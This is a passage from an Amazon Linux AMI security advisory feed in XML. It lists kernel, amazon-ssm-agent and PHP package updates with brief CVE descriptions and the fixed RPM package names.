When the PHP EXIF extension is parsing EXIF information from an image, e.g. via the exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data that will cause it to read past the allocated buffer. This may lead to information disclosure or a crash.
CVE-2019-11049:
In PHP versions 7.3.x below 7.3.13 and 7.4.0 on Windows, when supplying custom headers to the mail() function, due to a mistake introduced in commit 78f4b4a2dcf92ddbccea1bb95f8390a18ac3342e, if the header is supplied in lowercase, this can result in double-freeing certain memory locations.
CVE-2019-11047:
When the PHP EXIF extension is parsing EXIF information from an image, e.g. via the exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data that will cause it to read past the allocated buffer. This may lead to information disclosure or a crash.
CVE-2019-11046:
In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0, PHP bcmath extension functions on some systems, including Windows, can be tricked into reading beyond the allocated space by supplying them with a string containing characters that are identified as numeric by the OS but aren't ASCII digits. This can lead to disclosure of the content of some memory locations.
CVE-2019-11045:
In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0, the PHP DirectoryIterator class accepts filenames with an embedded \0 byte and treats them as terminating at that byte. This could lead to security vulnerabilities, e.g. in applications checking which paths the code is allowed to access.
CVE-2019-11044:
A flaw was discovered in the link function in PHP. When compiled on Windows, it does not correctly handle paths containing NULL bytes. An attacker could abuse this flaw to bypass application checks on file paths.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11044" title="" id="CVE-2019-11044" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11045" title="" id="CVE-2019-11045" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11046" title="" id="CVE-2019-11046" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11047" title="" id="CVE-2019-11047" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11049" title="" id="CVE-2019-11049" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11050" title="" id="CVE-2019-11050" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18218" title="" id="CVE-2019-18218" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php73-pdo" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package 
name="php73-fpm" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.13" release="1.22.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php73-tidy-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package 
name="php73-dba" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.13-1.22.amzn1.i686.rpm</filename></package><package 
name="php73-gmp" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.13-1.22.amzn1.i686.rpm</filename></package><package 
name="php73-pdo" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.13-1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2024-1919</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1919: important priority package update for kernel</title><issued date="2024-02-14 20:03:00" /><updated date="2024-02-19 19:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-1086:
A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.
The nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.
We recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1086" title="" id="CVE-2024-1086" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.336" release="179.559.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.336-179.559.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1920</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1920: important priority package update for amazon-ssm-agent</title><issued date="2024-02-14 20:03:00" /><updated date="2024-04-25 16:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-49569:
A path traversal vulnerability was discovered in go-git versions prior to v5.11. This vulnerability allows an attacker to create and amend files across the filesystem. In the worst-case scenario, remote code execution could be achieved.
Applications are only affected if they are using the ChrootOS https://pkg.go.dev/github.com/go-git/go-billy/v5/osfs#ChrootOS , which is the default when using "Plain" versions of Open and Clone funcs (e.g. PlainClone). Applications using BoundOS https://pkg.go.dev/github.com/go-git/go-billy/v5/osfs#BoundOS or in-memory filesystems are not affected by this issue.
This is a go-git implementation issue and does not affect the upstream git cli.
CVE-2023-49568:
A denial of service (DoS) vulnerability was discovered in go-git versions prior to v5.11. This vulnerability allows an attacker to perform denial of service attacks by providing specially crafted responses from a Git server which triggers resource exhaustion in go-git clients.
Applications using only the in-memory filesystem supported by go-git are not affected by this vulnerability.
This is a go-git implementation issue and does not affect the upstream git cli.
CVE-2023-39326:
A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body. A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request. Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.
CVE-2023-39325:
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39325" title="" id="CVE-2023-39325" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39326" title="" id="CVE-2023-39326" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49568" title="" id="CVE-2023-49568" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49569" title="" id="CVE-2023-49569" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="amazon-ssm-agent" version="3.2.2222.0" release="1.amzn1" epoch="0" arch="x86_64"><filename>Packages/amazon-ssm-agent-3.2.2222.0-1.amzn1.x86_64.rpm</filename></package><package name="amazon-ssm-agent-debuginfo" version="3.2.2222.0" release="1.amzn1" epoch="0" arch="x86_64"><filename>Packages/amazon-ssm-agent-debuginfo-3.2.2222.0-1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1921</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1921: important priority package update for php72</title><issued date="2024-02-14 20:03:00" /><updated date="2024-02-28 23:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18218:
cdf_read_property_info in cdf.c in file through 5.37 does not restrict the number of CDF_VECTOR elements, which allows a heap-based buffer overflow (4-byte out-of-bounds write).
CVE-2019-11050:
When the PHP EXIF extension is parsing EXIF information from an image, e.g. via the exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data that will cause it to read past the allocated buffer. This may lead to information disclosure or a crash.
CVE-2019-11049:
In PHP versions 7.3.x below 7.3.13 and 7.4.0 on Windows, when supplying custom headers to the mail() function, due to a mistake introduced in commit 78f4b4a2dcf92ddbccea1bb95f8390a18ac3342e, if the header is supplied in lowercase, this can result in double-freeing certain memory locations.
CVE-2019-11047:
When the PHP EXIF extension is parsing EXIF information from an image, e.g. via the exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data that will cause it to read past the allocated buffer. This may lead to information disclosure or a crash.
CVE-2019-11046:
In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0, PHP bcmath extension functions on some systems, including Windows, can be tricked into reading beyond the allocated space by supplying them with a string containing characters that are identified as numeric by the OS but aren't ASCII digits. This can lead to disclosure of the content of some memory locations.
CVE-2019-11045:
In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0, the PHP DirectoryIterator class accepts filenames with an embedded \0 byte and treats them as terminating at that byte. This could lead to security vulnerabilities, e.g. in applications checking which paths the code is allowed to access.
CVE-2019-11044:
A flaw was discovered in the link function in PHP. When compiled on Windows, it does not correctly handle paths containing NULL bytes. An attacker could abuse this flaw to bypass application checks on file paths.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11044" title="" id="CVE-2019-11044" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11045" title="" id="CVE-2019-11045" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11046" title="" id="CVE-2019-11046" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11047" title="" id="CVE-2019-11047" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11049" title="" id="CVE-2019-11049" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11050" title="" id="CVE-2019-11050" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18218" title="" id="CVE-2019-18218" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-tidy" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" 
version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.26" release="1.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php72-odbc-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.26" 
release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-common" 